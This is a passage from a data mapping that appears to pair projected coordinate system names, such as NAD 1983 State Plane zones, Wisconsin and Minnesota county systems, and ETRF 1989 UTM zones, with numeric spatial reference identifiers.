'NAD_1983_StatePlane_Virginia_North_FIPS_4501_Feet': 102746, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502_Feet': 102747, 'NAD_1983_StatePlane_Washington_North_FIPS_4601_Feet': 102748, 'NAD_1983_StatePlane_Washington_South_FIPS_4602_Feet': 102749, 'NAD_1983_StatePlane_West_Virginia_North_FIPS_4701_Feet': 102750, 'NAD_1983_StatePlane_West_Virginia_South_FIPS_4702_Feet': 102751, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801_Feet': 102752, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 102753, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803_Feet': 102754, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901_Feet': 102755, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 102756, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 102757, 'NAD_1983_StatePlane_Wyoming_West_FIPS_4904_Feet': 102758, 'NAD_1983_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200_Feet': 102761, 'NAD_1983_StatePlane_Kentucky_FIPS_1600_Feet': 102763, 'NAD_1983_StatePlane_Guam_FIPS_5400_Feet': 102766, 'NAD_1983_HARN_WISCRS_Adams_County_Meters': 103300, 'NAD_1983_HARN_WISCRS_Ashland_County_Meters': 103301, 'NAD_1983_HARN_WISCRS_Barron_County_Meters': 103302, 'NAD_1983_HARN_WISCRS_Bayfield_County_Meters': 103303, 'NAD_1983_HARN_WISCRS_Brown_County_Meters': 103304, 'NAD_1983_HARN_WISCRS_Buffalo_County_Meters': 103305, 'NAD_1983_HARN_WISCRS_Burnett_County_Meters': 103306, 'NAD_1983_HARN_WISCRS_Calumet_County_Meters': 103307, 'NAD_1983_HARN_WISCRS_Chippewa_County_Meters': 103308, 'NAD_1983_HARN_WISCRS_Clark_County_Meters': 103309, 'NAD_1983_HARN_WISCRS_Columbia_County_Meters': 103310, 'NAD_1983_HARN_WISCRS_Crawford_County_Meters': 103311, 'NAD_1983_HARN_WISCRS_Dane_County_Meters': 103312, 'NAD_1983_HARN_WISCRS_Dodge_County_Meters': 103313, 'NAD_1983_HARN_WISCRS_Door_County_Meters': 103314, 'NAD_1983_HARN_WISCRS_Douglas_County_Meters': 103315, 'NAD_1983_HARN_WISCRS_Dunn_County_Meters': 103316, 'NAD_1983_HARN_WISCRS_EauClaire_County_Meters': 103317, 'NAD_1983_HARN_WISCRS_Florence_County_Meters': 103318, 'NAD_1983_HARN_WISCRS_Fond_du_Lac_County_Meters': 103319, 'NAD_1983_HARN_WISCRS_Forest_County_Meters': 103320, 'NAD_1983_HARN_WISCRS_Grant_County_Meters': 103321, 'NAD_1983_HARN_WISCRS_Green_County_Meters': 103322, 'NAD_1983_HARN_WISCRS_GreenLake_County_Meters': 103323, 'NAD_1983_HARN_WISCRS_Iowa_County_Meters': 103324, 'NAD_1983_HARN_WISCRS_Iron_County_Meters': 103325, 'NAD_1983_HARN_WISCRS_Jackson_County_Meters': 103326, 'NAD_1983_HARN_WISCRS_Jefferson_County_Meters': 103327, 'NAD_1983_HARN_WISCRS_Juneau_County_Meters': 103328, 'NAD_1983_HARN_WISCRS_Kenosha_County_Meters': 103329, 'NAD_1983_HARN_WISCRS_Kewaunee_County_Meters': 103330, 'NAD_1983_HARN_WISCRS_LaCrosse_County_Meters': 103331, 'NAD_1983_HARN_WISCRS_Lafayette_County_Meters': 103332, 'NAD_1983_HARN_WISCRS_Langlade_County_Meters': 103333, 'NAD_1983_HARN_WISCRS_Lincoln_County_Meters': 103334, 'NAD_1983_HARN_WISCRS_Manitowoc_County_Meters': 103335, 'NAD_1983_HARN_WISCRS_Marathon_County_Meters': 103336, 'NAD_1983_HARN_WISCRS_Marinette_County_Meters': 103337, 'NAD_1983_HARN_WISCRS_Marquette_County_Meters': 103338, 'NAD_1983_HARN_WISCRS_Menominee_County_Meters': 103339, 'NAD_1983_HARN_WISCRS_Milwaukee_County_Meters': 103340, 'NAD_1983_HARN_WISCRS_Monroe_County_Meters': 103341, 'NAD_1983_HARN_WISCRS_Oconto_County_Meters': 103342, 'NAD_1983_HARN_WISCRS_Oneida_County_Meters': 103343, 'NAD_1983_HARN_WISCRS_Outagamie_County_Meters': 103344, 'NAD_1983_HARN_WISCRS_Ozaukee_County_Meters': 103345, 'NAD_1983_HARN_WISCRS_Pepin_County_Meters': 103346, 'NAD_1983_HARN_WISCRS_Pierce_County_Meters': 103347, 'NAD_1983_HARN_WISCRS_Polk_County_Meters': 103348, 'NAD_1983_HARN_WISCRS_Portage_County_Meters': 103349, 'NAD_1983_HARN_WISCRS_Price_County_Meters': 103350, 'NAD_1983_HARN_WISCRS_Racine_County_Meters': 103351, 'NAD_1983_HARN_WISCRS_Richland_County_Meters': 103352, 'NAD_1983_HARN_WISCRS_Rock_County_Meters': 103353, 'NAD_1983_HARN_WISCRS_Rusk_County_Meters': 103354, 'NAD_1983_HARN_WISCRS_Sauk_County_Meters': 103355, 'NAD_1983_HARN_WISCRS_Sawyer_County_Meters': 103356, 'NAD_1983_HARN_WISCRS_Shawano_County_Meters': 103357, 'NAD_1983_HARN_WISCRS_Sheboygan_County_Meters': 103358, 'NAD_1983_HARN_WISCRS_St_Croix_County_Meters': 103359, 'NAD_1983_HARN_WISCRS_Taylor_County_Meters': 103360, 'NAD_1983_HARN_WISCRS_Trempealeau_County_Meters': 103361, 'NAD_1983_HARN_WISCRS_Vernon_County_Meters': 103362, 'NAD_1983_HARN_WISCRS_Vilas_County_Meters': 103363, 'NAD_1983_HARN_WISCRS_Walworth_County_Meters': 103364, 'NAD_1983_HARN_WISCRS_Washburn_County_Meters': 103365, 'NAD_1983_HARN_WISCRS_Washington_County_Meters': 103366, 'NAD_1983_HARN_WISCRS_Waukesha_County_Meters': 103367, 'NAD_1983_HARN_WISCRS_Waupaca_County_Meters': 103368, 'NAD_1983_HARN_WISCRS_Waushara_County_Meters': 103369, 'NAD_1983_HARN_WISCRS_Winnebago_County_Meters': 103370, 'NAD_1983_HARN_WISCRS_Wood_County_Meters': 103371, 'NAD_1983_HARN_WISCRS_Adams_County_Feet': 103400, 'NAD_1983_HARN_WISCRS_Ashland_County_Feet': 103401, 'NAD_1983_HARN_WISCRS_Barron_County_Feet': 103402, 'NAD_1983_HARN_WISCRS_Bayfield_County_Feet': 103403, 'NAD_1983_HARN_WISCRS_Brown_County_Feet': 103404, 'NAD_1983_HARN_WISCRS_Buffalo_County_Feet': 103405, 'NAD_1983_HARN_WISCRS_Burnett_County_Feet': 103406, 'NAD_1983_HARN_WISCRS_Calumet_County_Feet': 103407, 'NAD_1983_HARN_WISCRS_Chippewa_County_Feet': 103408, 'NAD_1983_HARN_WISCRS_Clark_County_Feet': 103409, 'NAD_1983_HARN_WISCRS_Columbia_County_Feet': 103410, 'NAD_1983_HARN_WISCRS_Crawford_County_Feet': 103411, 'NAD_1983_HARN_WISCRS_Dane_County_Feet': 103412, 'NAD_1983_HARN_WISCRS_Dodge_County_Feet': 103413, 'NAD_1983_HARN_WISCRS_Door_County_Feet': 103414, 'NAD_1983_HARN_WISCRS_Douglas_County_Feet': 103415, 'NAD_1983_HARN_WISCRS_Dunn_County_Feet': 103416, 'NAD_1983_HARN_WISCRS_EauClaire_County_Feet': 103417, 'NAD_1983_HARN_WISCRS_Florence_County_Feet': 103418, 'NAD_1983_HARN_WISCRS_Fond_du_Lac_County_Feet': 103419, 'NAD_1983_HARN_WISCRS_Forest_County_Feet': 103420, 'NAD_1983_HARN_WISCRS_Grant_County_Feet': 103421, 'NAD_1983_HARN_WISCRS_Green_County_Feet': 103422, 'NAD_1983_HARN_WISCRS_GreenLake_County_Feet': 103423, 'NAD_1983_HARN_WISCRS_Iowa_County_Feet': 103424, 'NAD_1983_HARN_WISCRS_Iron_County_Feet': 103425, 'NAD_1983_HARN_WISCRS_Jackson_County_Feet': 103426, 'NAD_1983_HARN_WISCRS_Jefferson_County_Feet': 103427, 'NAD_1983_HARN_WISCRS_Juneau_County_Feet': 103428, 'NAD_1983_HARN_WISCRS_Kenosha_County_Feet': 103429, 'NAD_1983_HARN_WISCRS_Kewaunee_County_Feet': 103430, 'NAD_1983_HARN_WISCRS_LaCrosse_County_Feet': 103431, 'NAD_1983_HARN_WISCRS_Lafayette_County_Feet': 103432, 'NAD_1983_HARN_WISCRS_Langlade_County_Feet': 103433, 'NAD_1983_HARN_WISCRS_Lincoln_County_Feet': 103434, 'NAD_1983_HARN_WISCRS_Manitowoc_County_Feet': 103435, 'NAD_1983_HARN_WISCRS_Marathon_County_Feet': 103436, 'NAD_1983_HARN_WISCRS_Marinette_County_Feet': 103437, 'NAD_1983_HARN_WISCRS_Marquette_County_Feet': 103438, 'NAD_1983_HARN_WISCRS_Menominee_County_Feet': 103439, 'NAD_1983_HARN_WISCRS_Milwaukee_County_Feet': 103440, 'NAD_1983_HARN_WISCRS_Monroe_County_Feet': 103441, 'NAD_1983_HARN_WISCRS_Oconto_County_Feet': 103442, 'NAD_1983_HARN_WISCRS_Oneida_County_Feet': 103443, 'NAD_1983_HARN_WISCRS_Outagamie_County_Feet': 103444, 'NAD_1983_HARN_WISCRS_Ozaukee_County_Feet': 103445, 'NAD_1983_HARN_WISCRS_Pepin_County_Feet': 103446, 'NAD_1983_HARN_WISCRS_Pierce_County_Feet': 103447, 'NAD_1983_HARN_WISCRS_Polk_County_Feet': 103448, 'NAD_1983_HARN_WISCRS_Portage_County_Feet': 103449, 'NAD_1983_HARN_WISCRS_Price_County_Feet': 103450, 'NAD_1983_HARN_WISCRS_Racine_County_Feet': 103451, 'NAD_1983_HARN_WISCRS_Richland_County_Feet': 103452, 'NAD_1983_HARN_WISCRS_Rock_County_Feet': 103453, 'NAD_1983_HARN_WISCRS_Rusk_County_Feet': 103454, 'NAD_1983_HARN_WISCRS_Sauk_County_Feet': 103455, 'NAD_1983_HARN_WISCRS_Sawyer_County_Feet': 103456, 'NAD_1983_HARN_WISCRS_Shawano_County_Feet': 103457, 'NAD_1983_HARN_WISCRS_Sheboygan_County_Feet': 103458, 'NAD_1983_HARN_WISCRS_St_Croix_County_Feet': 103459, 'NAD_1983_HARN_WISCRS_Taylor_County_Feet': 103460, 'NAD_1983_HARN_WISCRS_Trempealeau_County_Feet': 103461, 'NAD_1983_HARN_WISCRS_Vernon_County_Feet': 103462, 'NAD_1983_HARN_WISCRS_Vilas_County_Feet': 103463, 'NAD_1983_HARN_WISCRS_Walworth_County_Feet': 103464, 'NAD_1983_HARN_WISCRS_Washburn_County_Feet': 103465, 'NAD_1983_HARN_WISCRS_Washington_County_Feet': 103466, 'NAD_1983_HARN_WISCRS_Waukesha_County_Feet': 103467, 'NAD_1983_HARN_WISCRS_Waupaca_County_Feet': 103468, 'NAD_1983_HARN_WISCRS_Waushara_County_Feet': 103469, 'NAD_1983_HARN_WISCRS_Winnebago_County_Feet': 103470, 'NAD_1983_HARN_WISCRS_Wood_County_Feet': 103471, 'ETRF_1989_UTM_Zone_28N': 103528, 'ETRF_1989_UTM_Zone_29N': 103529, 'ETRF_1989_UTM_Zone_30N': 103530, 'ETRF_1989_UTM_Zone_31N': 103531, 'ETRF_1989_UTM_Zone_32N': 103532, 'ETRF_1989_UTM_Zone_33N': 103533, 'ETRF_1989_UTM_Zone_34N': 103534, 'ETRF_1989_UTM_Zone_35N': 103535, 'ETRF_1989_UTM_Zone_36N': 103536, 'ETRF_1989_UTM_Zone_37N': 103537, 'ETRF_1989_UTM_Zone_38N': 103538, 'ETRF_1989_TM_Baltic_1993': 103584, 'NAD_1983_HARN_Adj_MN_Aitkin_Meters': 103600, 'NAD_1983_HARN_Adj_MN_Clay_Meters': 103601, 'NAD_1983_HARN_Adj_MN_Clearwater_Meters': 103602, 'NAD_1983_HARN_Adj_MN_Hubbard_Meters': 103603, 'NAD_1983_HARN_Adj_MN_Lake_Meters': 103604, 'NAD_1983_HARN_Adj_MN_Mille_Lacs_Meters': 103605, 'NAD_1983_HARN_Adj_MN_Washington_Meters': 103606, 'NAD_1983_HARN_Adj_MN_Wilkin_Meters': 103607, 'NAD_1983_HARN_Adj_MN_Anoka_Meters': 103608, 'NAD_1983_HARN_Adj_MN_Becker_Meters': 103609, 'NAD_1983_HARN_Adj_MN_Beltrami_North_Meters': 103610, 'NAD_1983_HARN_Adj_MN_Beltrami_South_Meters': 103611, 'NAD_1983_HARN_Adj_MN_Benton_Meters': 103612, 'NAD_1983_HARN_Adj_MN_Big_Stone_Meters': 103613, 'NAD_1983_HARN_Adj_MN_Blue_Earth_Meters': 103614, 'NAD_1983_HARN_Adj_MN_Brown_Meters': 103615, 'NAD_1983_HARN_Adj_MN_Carlton_Meters': 103616, 'NAD_1983_HARN_Adj_MN_Carver_Meters': 103617, 'NAD_1983_HARN_Adj_MN_Cass_North_Meters': 103618, 'NAD_1983_HARN_Adj_MN_Cass_South_Meters': 103619, 'NAD_1983_HARN_Adj_MN_Chippewa_Meters': 103620, 'NAD_1983_HARN_Adj_MN_Chisago_Meters': 103621, 'NAD_1983_HARN_Adj_MN_Cook_North_Meters': 103622, 'NAD_1983_HARN_Adj_MN_Cook_South_Meters': 103623, 'NAD_1983_HARN_Adj_MN_Cottonwood_Meters': 103624, 'NAD_1983_HARN_Adj_MN_Crow_Wing_Meters': 103625, 'NAD_1983_HARN_Adj_MN_Dakota_Meters': 103626, 'NAD_1983_HARN_Adj_MN_Dodge_Meters': 103627, 'NAD_1983_HARN_Adj_MN_Douglas_Meters': 103628, 'NAD_1983_HARN_Adj_MN_Faribault_Meters': 103629, 'NAD_1983_HARN_Adj_MN_Fillmore_Meters': 103630, 'NAD_1983_HARN_Adj_MN_Freeborn_Meters': 103631, 'NAD_1983_HARN_Adj_MN_Goodhue_Meters': 103632, 'NAD_1983_HARN_Adj_MN_Grant_Meters': 103633, 'NAD_1983_HARN_Adj_MN_Hennepin_Meters': 103634, 'NAD_1983_HARN_Adj_MN_Houston_Meters': 103635, 'NAD_1983_HARN_Adj_MN_Isanti_Meters': 103636, 'NAD_1983_HARN_Adj_MN_Itasca_North_Meters': 103637, 'NAD_1983_HARN_Adj_MN_Itasca_South_Meters': 103638, 'NAD_1983_HARN_Adj_MN_Jackson_Meters': 103639, 'NAD_1983_HARN_Adj_MN_Kanabec_Meters': 103640, 'NAD_1983_HARN_Adj_MN_Kandiyohi_Meters': 103641, 'NAD_1983_HARN_Adj_MN_Kittson_Meters': 103642, 'NAD_1983_HARN_Adj_MN_Koochiching_Meters': 103643, 'NAD_1983_HARN_Adj_MN_Lac_Qui_Parle_Meters': 103644, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North_Meters': 103645, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South_Meters': 103646, 'NAD_1983_HARN_Adj_MN_Le_Sueur_Meters': 103647, 'NAD_1983_HARN_Adj_MN_Lincoln_Meters': 103648, 'NAD_1983_HARN_Adj_MN_Lyon_Meters': 103649, 'NAD_1983_HARN_Adj_MN_McLeod_Meters': 103650, 'NAD_1983_HARN_Adj_MN_Mahnomen_Meters': 103651, 'NAD_1983_HARN_Adj_MN_Marshall_Meters': 103652, 'NAD_1983_HARN_Adj_MN_Martin_Meters': 103653, 'NAD_1983_HARN_Adj_MN_Meeker_Meters': 103654, 'NAD_1983_HARN_Adj_MN_Morrison_Meters': 103655, 'NAD_1983_HARN_Adj_MN_Mower_Meters': 103656, 'NAD_1983_HARN_Adj_MN_Murray_Meters': 103657, 'NAD_1983_HARN_Adj_MN_Nicollet_Meters': 103658, 'NAD_1983_HARN_Adj_MN_Nobles_Meters': 103659, 'NAD_1983_HARN_Adj_MN_Norman_Meters': 103660, 'NAD_1983_HARN_Adj_MN_Olmsted_Meters': 103661, 'NAD_1983_HARN_Adj_MN_Ottertail_Meters': 103662, 'NAD_1983_HARN_Adj_MN_Pennington_Meters': 103663, 'NAD_1983_HARN_Adj_MN_Pine_Meters': 103664, 'NAD_1983_HARN_Adj_MN_Pipestone_Meters': 103665, 'NAD_1983_HARN_Adj_MN_Polk_Meters': 103666, 'NAD_1983_HARN_Adj_MN_Pope_Meters': 103667, 'NAD_1983_HARN_Adj_MN_Ramsey_Meters': 103668, 'NAD_1983_HARN_Adj_MN_Red_Lake_Meters': 103669, 'NAD_1983_HARN_Adj_MN_Redwood_Meters': 103670, 'NAD_1983_HARN_Adj_MN_Renville_Meters': 103671, 'NAD_1983_HARN_Adj_MN_Rice_Meters': 103672, 'NAD_1983_HARN_Adj_MN_Rock_Meters': 103673, 'NAD_1983_HARN_Adj_MN_Roseau_Meters': 103674, 'NAD_1983_HARN_Adj_MN_St_Louis_North_Meters': 103675, 'NAD_1983_HARN_Adj_MN_St_Louis_Central_Meters': 103676, 'NAD_1983_HARN_Adj_MN_St_Louis_South_Meters': 103677, 'NAD_1983_HARN_Adj_MN_Scott_Meters': 103678, 'NAD_1983_HARN_Adj_MN_Sherburne_Meters': 103679, 'NAD_1983_HARN_Adj_MN_Sibley_Meters': 103680, 'NAD_1983_HARN_Adj_MN_Stearns_Meters': 103681, 'NAD_1983_HARN_Adj_MN_Steele_Meters': 103682, 'NAD_1983_HARN_Adj_MN_Stevens_Meters': 103683, 'NAD_1983_HARN_Adj_MN_Swift_Meters': 103684, 'NAD_1983_HARN_Adj_MN_Todd_Meters': 103685, 'NAD_1983_HARN_Adj_MN_Traverse_Meters': 103686, 'NAD_1983_HARN_Adj_MN_Wabasha_Meters': 103687, 'NAD_1983_HARN_Adj_MN_Wadena_Meters': 103688, 'NAD_1983_HARN_Adj_MN_Waseca_Meters': 103689, 'NAD_1983_HARN_Adj_MN_Watonwan_Meters': 103690, 'NAD_1983_HARN_Adj_MN_Winona_Meters': 103691, 'NAD_1983_HARN_Adj_MN_Wright_Meters': 103692, 'NAD_1983_HARN_Adj_MN_Yellow_Medicine_Meters': 103693, 'NAD_1983_HARN_Adj_MN_Aitkin_Feet': 103700, 'NAD_1983_HARN_Adj_MN_Clay_Feet': 103701, 'NAD_1983_HARN_Adj_MN_Clearwater_Feet': 103702, 'NAD_1983_HARN_Adj_MN_Hubbard_Feet': 103703, 'NAD_1983_HARN_Adj_MN_Lake_Feet': 103704, 'NAD_1983_HARN_Adj_MN_Mille_Lacs_Feet': 103705, 'NAD_1983_HARN_Adj_MN_Washington_Feet': 103706, 'NAD_1983_HARN_Adj_MN_Wilkin_Feet': 103707, 'NAD_1983_HARN_Adj_MN_Anoka_Feet': 103708, 'NAD_1983_HARN_Adj_MN_Becker_Feet': 103709, 'NAD_1983_HARN_Adj_MN_Beltrami_North_Feet': 103710, 'NAD_1983_HARN_Adj_MN_Beltrami_South_Feet': 103711, 'NAD_1983_HARN_Adj_MN_Benton_Feet': 103712, 'NAD_1983_HARN_Adj_MN_Big_Stone_Feet': 103713, 'NAD_1983_HARN_Adj_MN_Blue_Earth_Feet': 103714, 'NAD_1983_HARN_Adj_MN_Brown_Feet': 103715, 'NAD_1983_HARN_Adj_MN_Carlton_Feet': 103716, 'NAD_1983_HARN_Adj_MN_Carver_Feet': 103717, 'NAD_1983_HARN_Adj_MN_Cass_North_Feet': 103718, 'NAD_1983_HARN_Adj_MN_Cass_South_Feet': 103719, 'NAD_1983_HARN_Adj_MN_Chippewa_Feet': 103720, 'NAD_1983_HARN_Adj_MN_Chisago_Feet': 103721, 'NAD_1983_HARN_Adj_MN_Cook_North_Feet': 103722, 'NAD_1983_HARN_Adj_MN_Cook_South_Feet': 103723, 'NAD_1983_HARN_Adj_MN_Cottonwood_Feet': 103724, 'NAD_1983_HARN_Adj_MN_Crow_Wing_Feet': 103725, 'NAD_1983_HARN_Adj_MN_Dakota_Feet': 103726, 'NAD_1983_HARN_Adj_MN_Dodge_Feet': 103727, 'NAD_1983_HARN_Adj_MN_Douglas_Feet': 103728, 'NAD_1983_HARN_Adj_MN_Faribault_Feet': 103729, 'NAD_1983_HARN_Adj_MN_Fillmore_Feet': 103730, 'NAD_1983_HARN_Adj_MN_Freeborn_Feet': 103731, 'NAD_1983_HARN_Adj_MN_Goodhue_Feet': 103732, 'NAD_1983_HARN_Adj_MN_Grant_Feet': 103733, 'NAD_1983_HARN_Adj_MN_Hennepin_Feet': 103734, 'NAD_1983_HARN_Adj_MN_Houston_Feet': 103735, 'NAD_1983_HARN_Adj_MN_Isanti_Feet': 103736, 'NAD_1983_HARN_Adj_MN_Itasca_North_Feet': 103737, 'NAD_1983_HARN_Adj_MN_Itasca_South_Feet': 103738, 'NAD_1983_HARN_Adj_MN_Jackson_Feet': 103739, 'NAD_1983_HARN_Adj_MN_Kanabec_Feet': 103740, 'NAD_1983_HARN_Adj_MN_Kandiyohi_Feet': 103741, 'NAD_1983_HARN_Adj_MN_Kittson_Feet': 103742, 'NAD_1983_HARN_Adj_MN_Koochiching_Feet': 103743, 'NAD_1983_HARN_Adj_MN_Lac_Qui_Parle_Feet': 103744, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North_Feet': 103745, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South_Feet': 103746, 'NAD_1983_HARN_Adj_MN_Le_Sueur_Feet': 103747, 'NAD_1983_HARN_Adj_MN_Lincoln_Feet': 103748, 'NAD_1983_HARN_Adj_MN_Lyon_Feet': 103749, 'NAD_1983_HARN_Adj_MN_McLeod_Feet': 103750, 'NAD_1983_HARN_Adj_MN_Mahnomen_Feet': 103751, 'NAD_1983_HARN_Adj_MN_Marshall_Feet': 103752, 'NAD_1983_HARN_Adj_MN_Martin_Feet': 103753, 'NAD_1983_HARN_Adj_MN_Meeker_Feet': 103754, 'NAD_1983_HARN_Adj_MN_Morrison_Feet': 103755, 'NAD_1983_HARN_Adj_MN_Mower_Feet': 103756, 'NAD_1983_HARN_Adj_MN_Murray_Feet': 103757, 'NAD_1983_HARN_Adj_MN_Nicollet_Feet': 103758, 'NAD_1983_HARN_Adj_MN_Nobles_Feet': 103759, 'NAD_1983_HARN_Adj_MN_Norman_Feet': 103760, 'NAD_1983_HARN_Adj_MN_Olmsted_Feet': 103761, 'NAD_1983_HARN_Adj_MN_Ottertail_Feet': 103762, 'NAD_1983_HARN_Adj_MN_Pennington_Feet': 103763, 'NAD_1983_HARN_Adj_MN_Pine_Feet': 103764, 'NAD_1983_HARN_Adj_MN_Pipestone_Feet': 103765, 'NAD_1983_HARN_Adj_MN_Polk_Feet': 103766, 'NAD_1983_HARN_Adj_MN_Pope_Feet': 103767, 'NAD_1983_HARN_Adj_MN_Ramsey_Feet': 103768, 'NAD_1983_HARN_Adj_MN_Red_Lake_Feet': 103769, 'NAD_1983_HARN_Adj_MN_Redwood_Feet': 103770, 'NAD_1983_HARN_Adj_MN_Renville_Feet': 103771, 'NAD_1983_HARN_Adj_MN_Rice_Feet': 103772, 'NAD_1983_HARN_Adj_MN_Rock_Feet': 103773, 'NAD_1983_HARN_Adj_MN_Roseau_Feet': 103774, 'NAD_1983_HARN_Adj_MN_St_Louis_North_Feet': 103775, 'NAD_1983_HARN_Adj_MN_St_Louis_Central_Feet': 103776, 'NAD_1983_HARN_Adj_MN_St_Louis_South_Feet': 103777, 'NAD_1983_HARN_Adj_MN_Scott_Feet': 103778, 'NAD_1983_HARN_Adj_MN_Sherburne_Feet': 103779, 'NAD_1983_HARN_Adj_MN_Sibley_Feet': 103780, 'NAD_1983_HARN_Adj_MN_Stearns_Feet': 103781, 'NAD_1983_HARN_Adj_MN_Steele_Feet': 103782, 'NAD_1983_HARN_Adj_MN_Stevens_Feet': 103783, 'NAD_1983_HARN_Adj_MN_Swift_Feet': 103784, 'NAD_1983_HARN_Adj_MN_Todd_Feet': 103785, 'NAD_1983_HARN_Adj_MN_Traverse_Feet': 103786, 'NAD_1983_HARN_Adj_MN_Wabasha_Feet': 103787, 'NAD_1983_HARN_Adj_MN_Wadena_Feet': 103788, 'NAD_1983_HARN_Adj_MN_Waseca_Feet': 103789, 'NAD_1983_HARN_Adj_MN_Watonwan_Feet': 103790, 'NAD_1983_HARN_Adj_MN_Winona_Feet': 103791, 'NAD_1983_HARN_Adj_MN_Wright_Feet': 103792, 'NAD_1983_HARN_Adj_MN_Yellow_Medicine_Feet': 103793, 'NAD_1983_HARN_Adj_WI_Adams_Meters': 103800, 'NAD_1983_HARN_Adj_WI_Ashland_Meters': 103801, 'NAD_1983_HARN_Adj_WI_Barron_Meters': 103802, 'NAD_1983_HARN_Adj_WI_Brown_Meters': 103803, 'NAD_1983_HARN_Adj_WI_Buffalo_Meters': 103804, 'NAD_1983_HARN_Adj_WI_Calumet_Meters': 103805, 'NAD_1983_HARN_Adj_WI_Clark_Meters': 103806, 'NAD_1983_HARN_Adj_WI_Dodge_Meters': 103807, 'NAD_1983_HARN_Adj_WI_Door_Meters': 103808, 'NAD_1983_HARN_Adj_WI_Douglas_Meters': 103809, 'NAD_1983_HARN_Adj_WI_Dunn_Meters': 103810, 'NAD_1983_HARN_Adj_WI_Florence_Meters': 103811, 'NAD_1983_HARN_Adj_WI_Fond_du_Lac_Meters': 103812, 'NAD_1983_HARN_Adj_WI_Forest_Meters': 103813, 'NAD_1983_HARN_Adj_WI_Grant_Meters': 103814, 'NAD_1983_HARN_Adj_WI_Iowa_Meters': 103815, 'NAD_1983_HARN_Adj_WI_Iron_Meters': 103816, 'NAD_1983_HARN_Adj_WI_Jefferson_Meters': 103817, 'NAD_1983_HARN_Adj_WI_Juneau_Meters': 103818, 'NAD_1983_HARN_Adj_WI_Kenosha_Meters': 103819, 'NAD_1983_HARN_Adj_WI_Kewaunee_Meters': 103820, 'NAD_1983_HARN_Adj_WI_LaCrosse_Meters': 103821, 'NAD_1983_HARN_Adj_WI_Lincoln_Meters': 103822, 'NAD_1983_HARN_Adj_WI_Manitowoc_Meters': 103823, 'NAD_1983_HARN_Adj_WI_Marinette_Meters': 103824, 'NAD_1983_HARN_Adj_WI_Menominee_Meters': 103825, 'NAD_1983_HARN_Adj_WI_Milwaukee_Meters': 103826, 'NAD_1983_HARN_Adj_WI_Oconto_Meters': 103827, 'NAD_1983_HARN_Adj_WI_Outagamie_Meters': 103828, 'NAD_1983_HARN_Adj_WI_Ozaukee_Meters': 103829, 'NAD_1983_HARN_Adj_WI_Polk_Meters': 103830, 'NAD_1983_HARN_Adj_WI_Price_Meters': 103831, 'NAD_1983_HARN_Adj_WI_Racine_Meters': 103832, 'NAD_1983_HARN_Adj_WI_Rock_Meters': 103833, 'NAD_1983_HARN_Adj_WI_Rusk_Meters': 103834, 'NAD_1983_HARN_Adj_WI_St_Croix_Meters': 103835, 'NAD_1983_HARN_Adj_WI_Sauk_Meters': 103836, 'NAD_1983_HARN_Adj_WI_Shawano_Meters': 103837, 'NAD_1983_HARN_Adj_WI_Sheboygan_Meters': 103838, 'NAD_1983_HARN_Adj_WI_Trempealeau_Meters': 103839, 'NAD_1983_HARN_Adj_WI_Washington_Meters': 103840, 'NAD_1983_HARN_Adj_WI_Waukesha_Meters': 103841, 'NAD_1983_HARN_Adj_WI_Waupaca_Meters': 103842, 'NAD_1983_HARN_Adj_WI_Winnebago_Meters': 103843, 'NAD_1983_HARN_Adj_WI_Bayfield_Meters': 103844, 'NAD_1983_HARN_Adj_WI_Burnett_Meters': 103845, 'NAD_1983_HARN_Adj_WI_Chippewa_Meters': 103846, 'NAD_1983_HARN_Adj_WI_Columbia_Meters': 103847, 'NAD_1983_HARN_Adj_WI_Crawford_Meters': 103848, 'NAD_1983_HARN_Adj_WI_Dane_Meters': 103849, 'NAD_1983_HARN_Adj_WI_EauClaire_Meters': 103850, 'NAD_1983_HARN_Adj_WI_Green_Meters': 103851, 'NAD_1983_HARN_Adj_WI_GreenLake_Meters': 103852, 'NAD_1983_HARN_Adj_WI_Jackson_Meters': 103853, 'NAD_1983_HARN_Adj_WI_Lafayette_Meters': 103854, 'NAD_1983_HARN_Adj_WI_Langlade_Meters': 103855, 'NAD_1983_HARN_Adj_WI_Marathon_Meters': 103856, 'NAD_1983_HARN_Adj_WI_Marquette_Meters': 103857, 'NAD_1983_HARN_Adj_WI_Monroe_Meters': 103858, 'NAD_1983_HARN_Adj_WI_Oneida_Meters': 103859, 'NAD_1983_HARN_Adj_WI_Pepin_Meters': 103860, 'NAD_1983_HARN_Adj_WI_Pierce_Meters': 103861, 'NAD_1983_HARN_Adj_WI_Portage_Meters': 103862, 'NAD_1983_HARN_Adj_WI_Richland_Meters': 103863, 'NAD_1983_HARN_Adj_WI_Sawyer_Meters': 103864, 'NAD_1983_HARN_Adj_WI_Taylor_Meters': 103865, 'NAD_1983_HARN_Adj_WI_Vernon_Meters': 103866, 'NAD_1983_HARN_Adj_WI_Vilas_Meters': 103867, 'NAD_1983_HARN_Adj_WI_Walworth_Meters': 103868, 'NAD_1983_HARN_Adj_WI_Washburn_Meters': 103869, 'NAD_1983_HARN_Adj_WI_Waushara_Meters': 103870, 'NAD_1983_HARN_Adj_WI_Wood_Meters': 103871, 'NAD_1983_HARN_Adj_WI_Adams_Feet': 103900, 'NAD_1983_HARN_Adj_WI_Ashland_Feet': 103901, 'NAD_1983_HARN_Adj_WI_Barron_Feet': 103902, 'NAD_1983_HARN_Adj_WI_Brown_Feet': 103903, 'NAD_1983_HARN_Adj_WI_Buffalo_Feet': 103904, 'NAD_1983_HARN_Adj_WI_Calumet_Feet': 103905, 'NAD_1983_HARN_Adj_WI_Clark_Feet': 103906, 'NAD_1983_HARN_Adj_WI_Dodge_Feet': 103907, 'NAD_1983_HARN_Adj_WI_Door_Feet': 103908, 'NAD_1983_HARN_Adj_WI_Douglas_Feet': 103909, 'NAD_1983_HARN_Adj_WI_Dunn_Feet': 103910, 'NAD_1983_HARN_Adj_WI_Florence_Feet': 103911, 